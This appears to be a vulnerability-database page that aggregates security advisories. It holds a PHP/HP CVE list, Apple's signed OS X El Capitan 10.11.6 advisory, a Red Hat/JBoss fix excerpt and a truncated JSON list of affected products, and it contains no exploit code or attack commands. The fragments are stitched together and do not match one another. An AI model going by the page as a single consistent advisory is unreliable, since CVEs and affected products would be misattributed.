CVE-2016-5385 - "HTTPoxy", PHP
CVE-2016-4543 - PHP, multiple impact
CVE-2016-4071 - PHP, multiple impact
CVE-2016-4072 - PHP, multiple impact
CVE-2016-4542 - PHP, multiple impact
CVE-2016-4541 - PHP, multiple impact
CVE-2016-4540 - PHP, multiple impact
CVE-2016-4539 - PHP, multiple impact
CVE-2016-4538 - PHP, multiple impact
CVE-2016-4537 - PHP, multiple impact
CVE-2016-4343 - PHP, multiple impact
CVE-2016-4342 - PHP, multiple impact
CVE-2016-4070 - PHP, Denial of Service (DoS)
CVE-2016-4393 - PSRT110263, XSS vulnerability
CVE-2016-4394 - PSRT110263, HSTS vulnerability
CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow
CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow
PSRT110145
PSRT110263
PSRT110115
PSRT110116

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004

OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:

apache_mod_php Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in PHP versions prior to 5.5.36. These were addressed by updating PHP to version 5.5.36. CVE-2016-4650

Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro

Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read was addressed through improved input validation. CVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro

Audio Available for: OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted audio file may lead to the disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-4646 : Steven Seeley of Source Incite working with Trend Micro's Zero Day Initiative

Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro

bsdiff Available for: OS X El Capitan v10.11 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow existed in bspatch. This issue was addressed through improved bounds checking. CVE-2014-9862 : an anonymous researcher

CFNetwork Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed through improved restrictions. CVE-2016-4645 : Abhinav Bansal of Zscaler Inc.

CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)

CoreGraphics Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to elevate privileges Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative

FaceTime Available for: OS X El Capitan v10.11 and later Impact: An attacker in a privileged network position may be able to cause a relayed call to continue transmitting audio while appearing as if the call terminated Description: User interface inconsistencies existed in the handling of relayed calls. These issues were addressed through improved FaceTime display logic. CVE-2016-4635 : Martin Vigo

Graphics Drivers Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4634 : Stefan Esser of SektionEins

ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to cause a denial of service Description: A memory consumption issue was addressed through improved memory handling. CVE-2016-4632 : Evgeny Sidorov of Yandex

ImageIO Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)

ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports) CVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)

Intel Graphics Driver Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4633 : an anonymous researcher

IOHIDFamily Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4626 : Stefan Esser of SektionEins

IOSurface Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A use-after-free was addressed through improved memory management. CVE-2016-4625 : Ian Beer of Google Project Zero

Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1863 : Ian Beer of Google Project Zero CVE-2016-1864 : Ju Zhu of Trend Micro CVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team

Kernel Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent

libc++abi Available for: OS X El Capitan v10.11 and later Impact: An application may be able to execute arbitrary code with root privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4621 : an anonymous researcher

libexpat Available for: OS X El Capitan v10.11 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-0718 : Gustavo Grieco

LibreSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in LibreSSL before 2.2.7. These were addressed by updating LibreSSL to version 2.2.7. CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand, Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter

libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An access issue existed in the parsing of maliciously crafted XML files. This issue was addressed through improved input validation. CVE-2016-4449 : Kostya Serebryany

libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxml2 Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-4448 : Apple CVE-2016-4483 : Gustavo Grieco CVE-2016-4614 : Nick Wellnhofe CVE-2016-4615 : Nick Wellnhofer CVE-2016-4616 : Michael Paddon CVE-2016-4619 : Hanno Boeck

libxslt Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: Multiple vulnerabilities in libxslt Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-1684 : Nicolas GrA(c)goire CVE-2016-4607 : Nick Wellnhofer CVE-2016-4608 : Nicolas GrA(c)goire CVE-2016-4609 : Nick Wellnhofer CVE-2016-4610 : Nick Wellnhofer CVE-2016-4612 : Nicolas GrA(c)goire

Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to compromise of user information Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative

Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to execute arbitrary code leading to the compromise of user information Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative

Login Window Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a denial of service Description: A memory initialization issue was addressed through improved memory handling. CVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative

Login Window Available for: OS X El Capitan v10.11 and later Impact: A malicious application may be able to gain root privileges Description: A type confusion issue was addressed through improved memory handling. CVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative

OpenSSL Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. CVE-2016-2105 : Guido Vranken CVE-2016-2106 : Guido Vranken CVE-2016-2107 : Juraj Somorovsky CVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero CVE-2016-2109 : Brian Carpenter CVE-2016-2176 : Guido Vranken

QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2016-4596 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4597 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4600 : Ke Liu of Tencent's Xuanwu Lab CVE-2016-4602 : Ke Liu of Tencent's Xuanwu Lab

QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4598 : Ke Liu of Tencent's Xuanwu Lab

QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted SGI file may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4601 : Ke Liu of Tencent's Xuanwu Lab

QuickTime Available for: OS X El Capitan v10.11 and later Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-2016-4599 : Ke Liu of Tencent's Xuanwu Lab

Safari Login AutoFill Available for: OS X El Capitan v10.11 and later Impact: A user's password may be visible on screen Description: An issue existed in Safari's password auto-fill. This issue was addressed through improved matching of form fields. CVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD

Sandbox Profiles Available for: OS X El Capitan v10.11 and later Impact: A local application may be able to access the process list Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-2016-4594 : Stefan Esser of SektionEins

Note: OS X El Capitan 10.11.6 includes the security content of Safari 9.1.2. For further details see https://support.apple.com/kb/HT206900

OS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/

Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y +cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy pSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV xj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u wevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN ZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k ah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk mmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC JM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc 55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs xPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5 YozOGPQFmX0OviWCQsX6 =ng+m -----END PGP SIGNATURE----- . Description:

This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
A memory leak flaw was fixed in expat.

See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:

After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):

JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201605-0079",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2a"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2g"
      },
      {
        "model": "openssl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1s"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2d"
      },
      {
        "model": "esmpro/serveragentservice",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "all versions  (linux)"
      },
      {
        "model": "ucosminexus application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "express"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise v8.2 to  v9.4"
      },
      {
        "model": "cosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "professional for plug-in"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "ip38x/3000",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "web server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "none"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "foundation v8.2 to  v8.5"
      },
      {
        "model": "web server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "- security enhancement"
      },
      {
        "model": "ucosminexus service platform",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "- messaging"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "6.2"
      },
      {
        "model": "cosminexus application server version 5",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "ip38x/3500",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ucosminexus developer standard",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ip38x/fw120",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "enterprise linux hpc node eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7.2)"
      },
      {
        "model": "ip38x/1200",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0"
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "01"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "st ard v8.2 to  v9.4"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "enterprisedirectoryserver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver6.1 to  v8.0"
      },
      {
        "model": "ucosminexus application server smart edition",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.2"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v6.2"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "netvisorpro 6.1"
      },
      {
        "model": "ip38x/810",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "webotx enterprise service bus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.2 to  v9.3"
      },
      {
        "model": "ip38x/n500",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ucosminexus developer light",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  sg3600lm/lg/lj v6.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  intersecvm/sg v1.2"
      },
      {
        "model": "ip38x/1210",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "cosminexus developer version 5",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "express v8.2 to  v9.4"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "cosminexus developer light version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.1"
      },
      {
        "model": "ucosminexus application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "st ard-r"
      },
      {
        "model": "ucosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "base"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "ucosminexus service platform",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "none"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1t"
      },
      {
        "model": "capssuite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0 to  v4.0"
      },
      {
        "model": "cosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "base version 6"
      },
      {
        "model": "ucosminexus service architect",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "business connect v7.1.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v4.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7.2)"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.11 and later"
      },
      {
        "model": "ucosminexus application server enterprise",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "ip38x/5000",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7)"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 7.2)"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "7.0"
      },
      {
        "model": "ip38x/sr100",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "cosminexus application server standard",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "ucosminexus application server standard",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "cosminexus application server enterprise",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "cosminexus developer standard version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "cosminexus developer professional version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "professional"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2h"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.2"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  univerge sg3000lg/lj"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "(v. 6)"
      },
      {
        "model": "registered envelope service",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "paging server",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "nexus series switches 5.2 sv3",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1000v"
      },
      {
        "model": "network performance analytics",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ironport encryption appliance",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "spa51x series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mate collector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ata series analog terminal adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1900"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "network health framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.1"
      },
      {
        "model": "spa232d multi-line dect ata",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(1)"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.2.1"
      },
      {
        "model": "unified series ip phones",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "780011.5.2"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
